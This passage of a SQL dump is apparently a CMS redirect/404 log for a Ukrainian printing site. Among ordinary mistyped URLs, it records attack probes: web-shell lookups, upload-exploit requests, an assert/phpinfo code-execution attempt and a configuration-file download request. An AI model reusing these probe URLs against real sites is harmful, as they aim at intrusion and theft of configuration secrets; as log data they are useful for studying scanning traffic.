00:00:00',301),(1428,'http://ekvatorprint.com.ua/component/content/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:23','0000-00-00 00:00:00',301),(1429,'http://ekvatorprint.com.ua/component/content/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:24','0000-00-00 00:00:00',301),(1430,'http://ekvatorprint.com.ua/component/content/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:24','0000-00-00 00:00:00',301),(1431,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:25','0000-00-00 00:00:00',301),(1432,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:26','0000-00-00 00:00:00',301),(1433,'http://ekvatorprint.com.ua/index.php?view=article&id=12&Itemid=13','','','',6,0,'2016-06-12 00:58:12','0000-00-00 00:00:00',301),(1434,'http://ekvatorprint.com.ua/index.php?amp;id=11&Itemid=12','','','',6,0,'2016-06-12 00:58:17','0000-00-00 00:00:00',301),(1435,'http://ekvatorprint.com.ua/index.php?view=article&id=2&Itemid=3','','','',3,0,'2016-06-12 00:59:05','0000-00-00 00:00:00',301),(1436,'http://ekvatorprint.com.ua/ 361','','','',1,0,'2016-06-12 00:59:19','0000-00-00 00:00:00',301),(1437,'http://ekvatorprint.com.ua/ 337','','','',2,0,'2016-06-12 00:59:24','0000-00-00 00:00:00',301),(1438,'http://ekvatorprint.com.ua/forum/go.php?http://ya.ru=','','','',1,0,'2016-06-12 01:30:50','0000-00-00 00:00:00',301),(1439,'http://ekvatorprint.com.ua/images/shabloni_modulnih_kartin/трехкомпонентные','','http://ekvatorprint.com.ua/modulnye-kartiny','',1,0,'2016-06-12 03:52:16','0000-00-00 00:00:00',301),(1440,'http://ekvatorprint.com.ua/images/shabloni_modulnih_kartin/четырехкомпонентные','','http://ekvatorprint.com.ua/modulnye-kartiny','',1,0,'2016-06-12 03:52:17','0000-00-00 00:00:00',301),(1441,'http://ekvatorprint.com.ua/images/portfolio/plotternaya-podrezka/плоттерная','','http://ekvatorprint.com.ua/plotternaya-podrezka','',11,0,'2016-06-12 03:52:17','0000-00-00 00:00:00',301),(1442,'http://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная','','http://ekvatorprint.com.ua/plotternaya-podrezka','',4,0,'2016-06-12 03:52:17','0000-00-00 00:00:00',301),(1443,'http://ekvatorprint.com.ua/images/shabloni_modulnih_kartin/мш','','http://ekvatorprint.com.ua/modulnye-kartiny','',1,0,'2016-06-12 03:52:17','0000-00-00 00:00:00',301),(1444,'http://ekvatorprint.com.ua/images/pimeri_shablonov/превью','','http://ekvatorprint.com.ua/chetyrekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1445,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш4-1','','http://ekvatorprint.com.ua/chetyrekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1446,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш3-1','','http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1447,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш3-4','','http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1448,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш3-2','','http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1449,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш3-5','','http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1450,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш5-1','','http://ekvatorprint.com.ua/pyatikomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1451,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш5-2','','http://ekvatorprint.com.ua/pyatikomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1452,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie','','http://ekvatorprint.com.ua/internet-katalog-modulnykh-kartin','',3,0,'2016-06-12 05:19:42','0000-00-00 00:00:00',301),(1453,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш3-3','','http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:43','0000-00-00 00:00:00',301),(1454,'http://ekvatorprint.com.ua/images/pimeri_shablonov/мш3-6','','http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:43','0000-00-00 00:00:00',301),(1455,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/мш3-1','','http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',1,0,'2016-06-12 05:19:43','0000-00-00 00:00:00',301),(1456,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/connectors/php/connector.php','','http://ekvatorprint.com.ua/sites/all/libraries/elfinder/connectors/php/connector.php','',3,0,'2016-06-12 05:33:31','0000-00-00 00:00:00',301),(1457,'http://ekvatorprint.com.ua/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=d3AtY2FjaGUucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=','','ekvatorprint.com.ua','',6,0,'2016-06-17 00:52:46','0000-00-00 00:00:00',301),(1458,'http://ekvatorprint.com.ua/null','','','',32,0,'2016-06-17 11:52:52','0000-00-00 00:00:00',301),(1459,'http://ekvatorprint.com.ua/contacts.html','','','',3,0,'2016-06-17 13:55:07','0000-00-00 00:00:00',301),(1460,'http://ekvatorprint.com.ua/.git/','','http://ekvatorprint.com.ua/.git/','',6,0,'2016-06-19 16:25:12','0000-00-00 00:00:00',301),(1461,'http://ekvatorprint.com.ua/?option=com_content&view=article&itemid=2','','','',1,0,'2016-06-19 23:26:49','0000-00-00 00:00:00',301),(1462,'http://ekvatorprint.com.ua/qpwoeifchgvbxskfgueoxmzz','','','',1,0,'2016-06-21 10:44:54','0000-00-00 00:00:00',301),(1463,'http://ekvatorprint.com.ua/index.php?view=article&id=8&Itemid=9','','','',3,0,'2016-06-22 05:50:56','0000-00-00 00:00:00',301),(1464,'http://ekvatorprint.com.ua/googleb03dae61474e3018.html','','','',1,0,'2016-06-22 10:19:19','0000-00-00 00:00:00',301),(1465,'http://ekvatorprint.com.ua/pma/','','','',5,0,'2016-06-22 15:37:57','0000-00-00 00:00:00',301),(1466,'http://ekvatorprint.com.ua/phpmyadmin/','','','',9,0,'2016-06-22 16:06:32','0000-00-00 00:00:00',301),(1467,'http://ekvatorprint.com.ua/templates/gk_ilife/lib/scripts/menu.php?style','','http://ekvatorprint.com.ua/templates/gk_ilife/lib/scripts/menu.php?style','',1,0,'2016-06-23 14:36:35','0000-00-00 00:00:00',301),(1468,'http://ekvatorprint.com.ua/tmp/sfx.php?fun=assert&id_polls=phpinfo();','','','',1,0,'2016-06-24 07:39:13','0000-00-00 00:00:00',301),(1469,'http://ekvatorprint.com.ua/index.php?view=login&return=aHR0cDovL3d3dy5la3ZhdG9ycHJpbnQuY29tLnVhL3BvcnRmb2xpby9jYXRlZ29yeS8yLWJhbm5lcnM=','','','',15,0,'2016-06-25 02:50:29','0000-00-00 00:00:00',301),(1470,'http://ekvatorprint.com.ua/ska4ay.com/-as','','http://ekvatorprint.com.ua/','',1,0,'2016-06-25 06:05:06','0000-00-00 00:00:00',301),(1471,'http://ekvatorprint.com.ua/robots.txt.php','','','',2,0,'2016-06-25 10:20:07','0000-00-00 00:00:00',301),(1472,'http://ekvatorprint.com.ua/phpinfo1.php','','','',1,0,'2016-06-27 06:45:06','0000-00-00 00:00:00',301),(1473,'http://ekvatorprint.com.ua/\"/images/new.gif\"','','http://ekvatorprint.com.ua/banner-printing','',1,0,'2016-06-27 18:30:03','0000-00-00 00:00:00',301),(1474,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','','http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','',1,0,'2016-06-28 10:50:11','0000-00-00 00:00:00',301),(1475,'http://ekvatorprint.com.ua/���','','','',5,0,'2016-06-29 09:13:30','0000-00-00 00:00:00',301),(1476,'http://ekvatorprint.com.ua/internet-katalog-modulnykh..','','','',2,0,'2016-07-01 12:17:01','0000-00-00 00:00:00',301),(1477,'http://ekvatorprint.com.ua/component/content/frontpage','','','',23,0,'2016-07-03 02:17:38','0000-00-00 00:00:00',301),(1478,'http://ekvatorprint.com.ua/stats.php','','','',13,0,'2016-07-03 13:14:04','0000-00-00 00:00:00',301),(1479,'http://ekvatorprint.com.ua/security.php','','','',6,0,'2016-07-03 13:14:04','0000-00-00 00:00:00',301),(1480,'http://ekvatorprint.com.ua/wp-data.php','','','',1,0,'2016-07-03 13:14:05','0000-00-00 00:00:00',301),(1481,'http://ekvatorprint.com.ua/wp.php','','','',3,0,'2016-07-03 13:14:05','0000-00-00 00:00:00',301),(1482,'http://ekvatorprint.com.ua/wp-admin/options-smedia.php','','','',1,0,'2016-07-03 13:14:05','0000-00-00 00:00:00',301),(1483,'http://ekvatorprint.com.ua/ajax/wp-functions.php','','','',1,0,'2016-07-03 13:14:06','0000-00-00 00:00:00',301),(1484,'http://ekvatorprint.com.ua/xmlrppc.php','','','',11,0,'2016-07-03 13:14:06','0000-00-00 00:00:00',301),(1485,'http://ekvatorprint.com.ua/wpfoot.php','','','',6,0,'2016-07-03 13:14:07','0000-00-00 00:00:00',301),(1486,'http://ekvatorprint.com.ua/version.php','','','',2,0,'2016-07-03 13:14:08','0000-00-00 00:00:00',301),(1487,'http://ekvatorprint.com.ua/sw.php','','','',1,0,'2016-07-03 13:14:08','0000-00-00 00:00:00',301),(1488,'http://ekvatorprint.com.ua/shell.php','','','',11,0,'2016-07-03 13:14:09','0000-00-00 00:00:00',301),(1489,'http://ekvatorprint.com.ua/septii.php','','','',4,0,'2016-07-03 13:14:09','0000-00-00 00:00:00',301),(1490,'http://ekvatorprint.com.ua/septi.php','','','',1,0,'2016-07-03 13:14:10','0000-00-00 00:00:00',301),(1491,'http://ekvatorprint.com.ua/rssd.php','','','',7,0,'2016-07-03 13:14:10','0000-00-00 00:00:00',301),(1492,'http://ekvatorprint.com.ua/modx.php','','','',15,0,'2016-07-03 13:14:11','0000-00-00 00:00:00',301),(1493,'http://ekvatorprint.com.ua/mko.php','','','',8,0,'2016-07-03 13:14:11','0000-00-00 00:00:00',301),(1494,'http://ekvatorprint.com.ua/license2016.php','','','',3,0,'2016-07-03 13:14:12','0000-00-00 00:00:00',301),(1495,'http://ekvatorprint.com.ua/extract.php','','','',1,0,'2016-07-03 13:14:12','0000-00-00 00:00:00',301),(1496,'http://ekvatorprint.com.ua/extracts.php','','','',4,0,'2016-07-03 13:14:13','0000-00-00 00:00:00',301),(1497,'http://ekvatorprint.com.ua/elements.php','','','',1,0,'2016-07-03 13:14:13','0000-00-00 00:00:00',301),(1498,'http://ekvatorprint.com.ua/configbak.php','','','',8,0,'2016-07-03 13:14:14','0000-00-00 00:00:00',301),(1499,'http://ekvatorprint.com.ua/bookmark.php','','','',1,0,'2016-07-03 13:14:14','0000-00-00 00:00:00',301),(1500,'http://ekvatorprint.com.ua/4005.php','','','',1,0,'2016-07-03 13:14:15','0000-00-00 00:00:00',301),(1501,'http://ekvatorprint.com.ua/popup-pomo.php','','','',15,0,'2016-07-03 13:14:15','0000-00-00 00:00:00',301),(1502,'http://ekvatorprint.com.ua/mide.php','','','',9,0,'2016-07-03 13:14:15','0000-00-00 00:00:00',301),(1503,'http://ekvatorprint.com.ua/interface.php?action=publish','','','',1,0,'2016-07-03 13:14:16','0000-00-00 00:00:00',301),(1504,'http://ekvatorprint.com.ua/gemb.php','','','',6,0,'2016-07-03 13:14:17','0000-00-00 00:00:00',301),(1505,'http://ekvatorprint.com.ua/component/content/images/stories/mil.gif','','','',1,0,'2016-07-03 19:37:05','0000-00-00 00:00:00',301),(1506,'http://ekvatorprint.com.ua/component/content/images/stories/pbot.php','','','',1,0,'2016-07-03 19:37:06','0000-00-00 00:00:00',301),(1507,'http://ekvatorprint.com.ua/component/content/cfg-contactform-14/inc/upload.php','','','',3,0,'2016-07-03 19:37:31','0000-00-00 00:00:00',301),(1508,'http://ekvatorprint.com.ua/component/content/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2016-07-03 19:37:41','0000-00-00 00:00:00',301),(1509,'http://ekvatorprint.com.ua/p...]]></description><link>http:/www.nika-audita.com/news/shirokoformatnaja_pechat/2014-05-17-719</link><category>Бизнес</category><dc:creator>dangerlive123</dc:creator><guid>http:/www.nika-audita.com/news/2014-05-17-719</guid><pubDate>Sat, 17 May 2014 17:49:42 GMT</pubDate></item><item><title>Як відкрити трена','','','',7,0,'2016-07-04 20:57:59','0000-00-00 00:00:00',301),(1510,'http://ekvatorprint.com.ua/component/contact/contact/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2016-07-05 00:48:44','0000-00-00 00:00:00',301),(1511,'http://ekvatorprint.com.ua/38 (098) 407-92-92Моб.: 38 (099) 407-92-92','','','',1,0,'2016-07-06 05:28:19','0000-00-00 00:00:00',301),(1512,'http://ekvatorprint.com.ua/gen204?invalidResponse=q=https://translate.googleapis.com/translate_a/single?client=gtx&s,ql=154,r=,rl=0','','http://ekvatorprint.com.ua/','',1,0,'2016-07-06 12:54:39','0000-00-00 00:00:00',301),(1513,'http://ekvatorprint.com.ua/administrator/components/com_maianmedia/maianmedia.xml','','http://ekvatorprint.com.ua/administrator/components/com_maianmedia/maianmedia.xml','',1,0,'2016-07-06 21:21:18','0000-00-00 00:00:00',301),(1514,'http://ekvatorprint.com.ua/components/com_joomsport/includes/imgres.php','','http://ekvatorprint.com.ua/components/com_joomsport/includes/imgres.php','',1,0,'2016-07-06 21:27:59','0000-00-00 00:00:00',301),(1515,'http://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/simpleswfupload.xml','','http://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/simpleswfupload.xml','',2,0,'2016-07-06 22:00:26','0000-00-00 00:00:00',301),(1516,'http://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/com_simpleswfupload.xml','','http://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/com_simpleswfupload.xml','',1,0,'2016-07-07 04:50:05','0000-00-00 00:00:00',301),(1517,'http://ekvatorprint.com.ua/modules/mod_artuploader/upload.php','','http://ekvatorprint.com.ua/modules/mod_artuploader/upload.php','',3,0,'2016-07-07 11:40:30','0000-00-00 00:00:00',301),(1518,'http://ekvatorprint.com.ua/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:21','0000-00-00 00:00:00',301),(1519,'http://ekvatorprint.com.ua/elfinder.html','','','',1,0,'2016-07-07 20:00:21','0000-00-00 00:00:00',301),(1520,'http://ekvatorprint.com.ua/includes/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:22','0000-00-00 00:00:00',301),(1521,'http://ekvatorprint.com.ua/fckeditor/elFinder/elfinder.html','','','',1,0,'2016-07-07 20:00:22','0000-00-00 00:00:00',301),(1522,'http://ekvatorprint.com.ua/admin/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:22','0000-00-00 00:00:00',301),(1523,'http://ekvatorprint.com.ua/assets/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:22','0000-00-00 00:00:00',301),(1524,'http://ekvatorprint.com.ua/library/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:23','0000-00-00 00:00:00',301),(1525,'http://ekvatorprint.com.ua/lib/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:23','0000-00-00 00:00:00',301),(1526,'http://ekvatorprint.com.ua/jscripts/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:24','0000-00-00 00:00:00',301),(1527,'http://ekvatorprint.com.ua/assets/plugins/elfinder/elfinder.html','','','',1,0,'2016-07-07 20:00:24','0000-00-00 00:00:00',301),(1528,'http://ekvatorprint.com.ua/modules/mod_jfancy/mod_jfancy.xml','','http://ekvatorprint.com.ua/modules/mod_jfancy/mod_jfancy.xml','',1,0,'2016-07-08 05:25:23','0000-00-00 00:00:00',301),(1529,'http://ekvatorprint.com.ua/wiki/tiki-calendar.php','','','',1,0,'2016-07-08 11:06:21','0000-00-00 00:00:00',301),(1530,'http://ekvatorprint.com.ua/tikiwiki/tiki-calendar.php','','','',1,0,'2016-07-08 11:06:21','0000-00-00 00:00:00',301),(1531,'http://ekvatorprint.com.ua/web/tiki-calendar.php','','','',1,0,'2016-07-08 11:06:21','0000-00-00 00:00:00',301),(1532,'http://ekvatorprint.com.ua/libraries/import.class.php','','','',1,0,'2016-07-08 21:17:46','0000-00-00 00:00:00',301),(1533,'http://ekvatorprint.com.ua/wp-content/themes/THEME/functions.php?liu=qt&fukq=t&RNv=f','','','',3,0,'2016-07-09 12:05:11','0000-00-00 00:00:00',301),(1534,'http://ekvatorprint.com.ua/modules/modules/modules.php','','','',12,0,'2016-07-09 12:05:12','0000-00-00 00:00:00',301),(1535,'http://ekvatorprint.com.ua/wp-installation.php','','','',10,0,'2016-07-09 12:05:17','0000-00-00 00:00:00',301),(1536,'http://ekvatorprint.com.ua/wp-trackback.php','','','',8,0,'2016-07-09 12:05:17','0000-00-00 00:00:00',301),(1537,'http://ekvatorprint.com.ua/wp-signup.php','','','',4,0,'2016-07-09 12:05:17','0000-00-00 00:00:00',301),(1538,'http://ekvatorprint.com.ua/wp-settings.php','','','',3,0,'2016-07-09 12:05:18','0000-00-00 00:00:00',301),(1539,'http://ekvatorprint.com.ua/mysql.php','','','',5,0,'2016-07-09 12:05:19','0000-00-00 00:00:00',301),(1540,'http://ekvatorprint.com.ua/locoy.php','','','',3,0,'2016-07-09 12:05:19','0000-00-00 00:00:00',301),(1541,'http://ekvatorprint.com.ua/load-config.php','','','',4,0,'2016-07-09 12:05:20','0000-00-00 00:00:00',301),(1542,'http://ekvatorprint.com.ua/home.bak.php','','','',10,0,'2016-07-09 12:05:21','0000-00-00 00:00:00',301),(1543,'http://ekvatorprint.com.ua/cron.php','','','',11,0,'2016-07-09 12:05:21','0000-00-00 00:00:00',301),(1544,'http://ekvatorprint.com.ua/46456.php','','','',3,0,'2016-07-09 12:05:22','0000-00-00 00:00:00',301),(1545,'http://ekvatorprint.com.ua/4005..php','','','',3,0,'2016-07-09 12:05:22','0000-00-00 00:00:00',301),(1546,'http://ekvatorprint.com.ua/plugins/content/fsave/download.php?filename=configuration.php','','','',2,0,'2016-07-10 21:03:03','0000-00-00 00:00:00',301),(1547,'http://ekvatorprint.com.ua/assets/js/uploadify/uploadify.php','','http://ekvatorprint.com.ua/assets/js/uploadify/uploadify.php','',2,0,'2016-07-11 10:23:35','0000-00-00 00:00:00',301),(1548,'http://ekvatorprint.com.ua/templates/gk_ilife/lib/scripts/menu.php?style=moomenu&width=1&height=1&opacity=1&animation=1&speed=500/','','','',1,0,'2016-07-11 21:55:02','0000-00-00 00:00:00',301),(1549,'http://ekvatorprint.com.ua/images/save','','','',1,0,'2016-07-12 06:55:27','0000-00-00 00:00:00',301),(1550,'http://ekvatorprint.com.ua/uploadify/uploadify.php','','http://ekvatorprint.com.ua/uploadify/uploadify.php','',23,0,'2016-07-12 14:01:39','0000-00-00 00:00:00',301),(1551,'http://ekvatorprint.com.ua/http://ekvatorprint.com.ua/images/pimeri_shablonov/мш3-1 превью.png','','','',1,0,'2016-07-13 09:03:19','0000-00-00 00:00:00',301),(1552,'http://ekvatorprint.com.ua/domainsigma_removal_d6a0c93817763149c6f4a3200ca3497c46f93cc2.html','','','',2,0,'2016-07-13 13:12:41','0000-00-00 00:00:00',301),(1553,'http://ekvatorprint.com.ua/helpu.php?wphp4','','','',1,0,'2016-07-13 17:25:02','0000-00-00 00:00:00',301),(1554,'http://ekvatorprint.com.ua/wp-admin/install.php','','','',2,0,'2016-07-13 21:09:53','0000-00-00 00:00:00',301),(1555,'http://ekvatorprint.com.ua/http://ekvatorprint.com.ua/images/shabloni_modulnih_kartin/трехкомпонентные модульные картины.png','','','',1,0,'2016-07-14 07:45:37','0000-00-00 00:00:00',301),(1556,'http://ekvatorprint.com.ua/http:/ekvatorprint.com.ua','','','',1,0,'2016-07-14 08:28:45','0000-00-00 00:00:00',301),(1557,'http://ekvatorprint.com.ua/http:/ekvatorprint.com.ua/���','','','',1,0,'2016-07-14 08:28:46','0000-00-00 00:00:00',301),(1558,'http://ekvatorprint.com.ua/videohttp:/ekvatorprint.com.ua/video','','','',1,0,'2016-07-14 08:28:48','0000-00-00 00:00:00',301),(1559,'http://ekvatorprint.com.ua//www.googleadservices.com/pagead/conversion.js','','http://ekvatorprint.com.ua//www.googleadservices.com/pagead/conversion.js','',8,0,'2016-07-15 11:33:06','0000-00-00 00:00:00',301),(1560,'http://ekvatorprint.com.ua/index.php?option=com_community&view=frontpage','','','',5,0,'2016-07-16 12:19:43','0000-00-00 00:00:00',301),(1561,'http://ekvatorprint.com.ua/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1','','','',1,0,'2016-07-17 19:29:52','0000-00-00 00:00:00',301),(1562,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php','','','',15,0,'2016-07-17 22:46:06','0000-00-00 00:00:00',301),(1563,'http://ekvatorprint.com.ua/http:/ekvatorprint.com.ua/images/shabloni_modulnih_kartin/трехкомпонентные модульные картины.png','','','',2,0,'2016-07-18 05:15:42','0000-00-00 00:00:00',301),(1564,'http://ekvatorprint.com.ua/components/com_media/index.php?nila2114&dini','','','',11,0,'2016-07-18 20:08:26','0000-00-00 00:00:00',301),(1565,'http://ekvatorprint.com.ua/modules/pm_advancedsearch4/config.xml','','http://ekvatorprint.com.ua/modules/pm_advancedsearch4/config.xml','',1,0,'2016-07-21 13:54:27','0000-00-00 00:00:00',301),(1566,'http://ekvatorprint.com.ua/favicon\\.ico','','','',1,0,'2016-07-21 23:51:55','0000-00-00 00:00:00',301),(1567,'http://ekvatorprint.com.ua/wp-content/plugins/gravityforms/js/gravityforms.js','','','',1,0,'2016-07-22 10:22:51','0000-00-00 00:00:00',301),(1568,'http://ekvatorprint.com.ua/administrator/components/com_facileforms/facileforms.xml','','http://ekvatorprint.com.ua/administrator/components/com_facileforms/facileforms.xml','',1,0,'2016-07-22 14:41:23','0000-00-00 00:00:00',301),(1569,'http://ekvatorprint.com.ua/favicon.png','','https://www.google.com.ua/','',8,0,'2016-07-22 23:16:37','0000-00-00 00:00:00',301),(1570,'http://ekvatorprint.com.ua/favicon.gif','','https://www.google.com.ua/','',2,0,'2016-07-22 23:16:37','0000-00-00 00:00:00',301),(1571,'http://ekvatorprint.com.ua/favicon.jpg','','https://www.google.com.ua/','',2,0,'2016-07-22 23:16:37','0000-00-00 00:00:00',301),(1572,'http://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/bt_portfolio.xml',NULL,'http://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/bt_portfolio.xml','',2,0,'2016-07-26 15:45:17','0000-00-00 00:00:00',301),(1573,'http://ekvatorprint.com.ua/index.php?option=com_aicontactsafe',NULL,'http://ekvatorprint.com.ua/index.php?option=com_aicontactsafe','',3,0,'2016-07-26 17:00:17','0000-00-00 00:00:00',301),(1574,'http://ekvatorprint.com.ua/assets/modules/evogallery/js/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/assets/modules/evogallery/js/uploadify/uploadify.css','',5,0,'2016-07-27 12:23:55','0000-00-00 00:00:00',301),(1575,'http://ekvatorprint.com.ua/wp-content/plugins/wp-cache.php',NULL,'http://www.googlebot.com/bot.html','',7,0,'2016-07-28 06:12:18','0000-00-00 00:00:00',301),(1576,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/files/wp-cache.php',NULL,'http://www.googlebot.com/bot.html','',4,0,'2016-07-28 06:12:18','0000-00-00 00:00:00',301),(1577,'http://ekvatorprint.com.ua/http:/ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная подрезка в ЭкваторПринт-fill-530x530.png',NULL,'','',1,0,'2016-07-28 10:43:57','0000-00-00 00:00:00',301),(1578,'http://ekvatorprint.com.ua/wp-includes/wlwmanifest.xml',NULL,'http://www.example.com/','',115,0,'2016-07-30 06:58:54','0000-00-00 00:00:00',301),(1579,'http://ekvatorprint.com.ua/wp-content/plugins/wysija-newsletters/js/tinymce/tiny_mce.js',NULL,'','',1,0,'2016-07-30 16:10:32','0000-00-00 00:00:00',301),(1580,'http://ekvatorprint.com.ua/lyt/archive.php',NULL,'','',3,0,'2016-08-02 13:50:54','0000-00-00 00:00:00',301),(1581,'http://ekvatorprint.com.ua/modules/mod_feed/tmpl/layouts.php',NULL,'','',1,0,'2016-08-02 13:50:54','0000-00-00 00:00:00',301),(1582,'http://ekvatorprint.com.ua/images/error-log.php',NULL,'','',3,0,'2016-08-02 13:50:56','0000-00-00 00:00:00',301),(1583,'http://ekvatorprint.com.ua/includes/error-log.php',NULL,'','',1,0,'2016-08-02 13:50:56','0000-00-00 00:00:00',301),(1584,'http://ekvatorprint.com.ua/modules/error-log.php',NULL,'','',1,0,'2016-08-02 13:50:56','0000-00-00 00:00:00',301),(1585,'http://ekvatorprint.com.ua/media/error-log.php',NULL,'','',3,0,'2016-08-02 13:50:57','0000-00-00 00:00:00',301),(1586,'http://ekvatorprint.com.ua/cache/error-log.php',NULL,'','',1,0,'2016-08-02 13:50:57','0000-00-00 00:00:00',301),(1587,'http://ekvatorprint.com.ua/images/login.php?login=cmd',NULL,'','',2,0,'2016-08-02 13:50:58','0000-00-00 00:00:00',301),(1588,'http://ekvatorprint.com.ua/js/login.php?login=cmd',NULL,'','',1,0,'2016-08-02 13:50:58','0000-00-00 00:00:00',301),(1589,'http://ekvatorprint.com.ua/phpmyadmin/login.php?login=cmd',NULL,'','',1,0,'2016-08-02 13:50:59','0000-00-00 00:00:00',301),(1590,'http://ekvatorprint.com.ua/cache/login.php?login=cmd',NULL,'','',1,0,'2016-08-02 13:50:59','0000-00-00 00:00:00',301),(1591,'http://ekvatorprint.com.ua/media/login.php?login=cmd',NULL,'','',2,0,'2016-08-02 13:51:00','0000-00-00 00:00:00',301),(1592,'http://ekvatorprint.com.ua/images/systemcache.php',NULL,'','',1,0,'2016-08-02 13:51:00','0000-00-00 00:00:00',301),(1593,'http://ekvatorprint.com.ua/includes/systemcache.php',NULL,'','',1,0,'2016-08-02 13:51:01','0000-00-00 00:00:00',301),(1594,'http://ekvatorprint.com.ua/modules/systemcache.php',NULL,'','',1,0,'2016-08-02 13:51:01','0000-00-00 00:00:00',301),(1595,'http://ekvatorprint.com.ua/media/systemcache.php',NULL,'','',1,0,'2016-08-02 13:51:02','0000-00-00 00:00:00',301),(1596,'http://ekvatorprint.com.ua/cache/systemcache.php',NULL,'','',1,0,'2016-08-02 13:51:02','0000-00-00 00:00:00',301),(1597,'http://ekvatorprint.com.ua/modules/modules/login_wall.php?login=cmd',NULL,'','',2,0,'2016-08-02 13:51:03','0000-00-00 00:00:00',301),(1598,'http://ekvatorprint.com.ua/BirdsRio.php',NULL,'','',4,0,'2016-08-02 13:51:05','0000-00-00 00:00:00',301),(1599,'http://ekvatorprint.com.ua/Fbrrchive.php',NULL,'','',1,0,'2016-08-02 13:51:06','0000-00-00 00:00:00',301),(1600,'http://ekvatorprint.com.ua/Hodienne.php',NULL,'','',1,0,'2016-08-02 13:51:06','0000-00-00 00:00:00',301),(1601,'http://ekvatorprint.com.ua/backup.php',NULL,'','',4,0,'2016-08-02 13:51:07','0000-00-00 00:00:00',301),(1602,'http://ekvatorprint.com.ua/dpllnzesgr4lops.php',NULL,'','',3,0,'2016-08-02 13:51:08','0000-00-00 00:00:00',301),(1603,'http://ekvatorprint.com.ua/error-log.php',NULL,'','',10,0,'2016-08-02 13:51:08','0000-00-00 00:00:00',301),(1604,'http://ekvatorprint.com.ua/exit-point.php',NULL,'','',3,0,'2016-08-02 13:51:09','0000-00-00 00:00:00',301),(1605,'http://ekvatorprint.com.ua/head.php',NULL,'','',2,0,'2016-08-02 13:51:10','0000-00-00 00:00:00',301),(1606,'http://ekvatorprint.com.ua/kui.php',NULL,'','',3,0,'2016-08-02 13:51:10','0000-00-00 00:00:00',301),(1607,'http://ekvatorprint.com.ua/layouts.php',NULL,'','',1,0,'2016-08-02 13:51:11','0000-00-00 00:00:00',301),(1608,'http://ekvatorprint.com.ua/news.php',NULL,'','',12,0,'2016-08-02 13:51:11','0000-00-00 00:00:00',301),(1609,'http://ekvatorprint.com.ua/revslider.php',NULL,'','',1,0,'2016-08-02 13:51:12','0000-00-00 00:00:00',301),(1610,'http://ekvatorprint.com.ua/systemcache.php',NULL,'','',3,0,'2016-08-02 13:51:12','0000-00-00 